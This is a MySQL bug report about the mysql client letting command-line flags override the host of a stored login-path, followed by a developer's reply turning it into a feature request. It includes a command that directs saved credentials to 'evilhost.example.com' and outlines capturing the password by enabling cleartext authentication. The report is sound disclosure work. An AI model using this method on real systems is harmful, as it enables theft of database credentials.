Bug #74545 mysql allows to override login-path
Submitted: 24 Oct 2014 10:53 Modified: 17 Jul 2015 14:11
Reporter: Daniël van Eeden (OCA) Email Updates:
Status: Verified Impact on me:
None 
Category:MySQL Server: Command-line Clients Severity:S4 (Feature request)
Version:5.6.19 OS:Any
Assigned to: CPU Architecture:Any

[24 Oct 2014 10:53] Daniël van Eeden
Description:
Situation:
PS C:\> mysql_config_editor.exe print --all
[srv001]
user = root
password = *****

When I try to set/change the host or user for this login path the login path will be completely overridden. This seems like a security measure.

PS C:\> mysql_config_editor.exe set --login-path=srv001 --user foo
WARNING : 'srv001' path already exists and will be overwritten.
 Continue? (Press y|Y for Yes, any other key for No) : n

But, I am allowed to do this:
mysql --login-path=srv001 -u foo
mysql --login-path=srv001 -h evilhost.example.com
mysql --login-path=srv001 -P 3307

This can make it possible to get the client to connect to an host controlled by an attacker. The client will then happily supply the password. It seems to be possible to also use --enable-cleartext-plugin.

How to repeat:
Setup a loginpath with a user, password and optionally an host.

Then try to connect to another host.

Possibily setup the mysqld on the other host to ask for a cleartext password (e.g. by using authentication_pam) and enable cleartext passwords on the client. Now you can dump the network traffic to get the password.

Suggested fix:
Make host a required option in a login path. Don't allow to override it (yes we can still fake dns or change the hosts file).

Also don't allow overriding of SSL options.

Store whether cleartext plugins are allowed in the loginpath.
[17 Jul 2015 14:11] Georgi Kodinov
I don't think overriding data from the command prompt is a security issue. 
If you get access to the user's shell you can for sure read the mylogin.cnf file too. So I'm going to convert this to a feature request. 

I like your idea about adding the http://dev.mysql.com/doc/refman/5.7/en/mysql-command-options.html#option_mysql_enable-clea... option to list of options the mysql_config_editor handles. IMHO mysql_config_editor should support all of the authentication related options too (i.e. the -ssl options etc).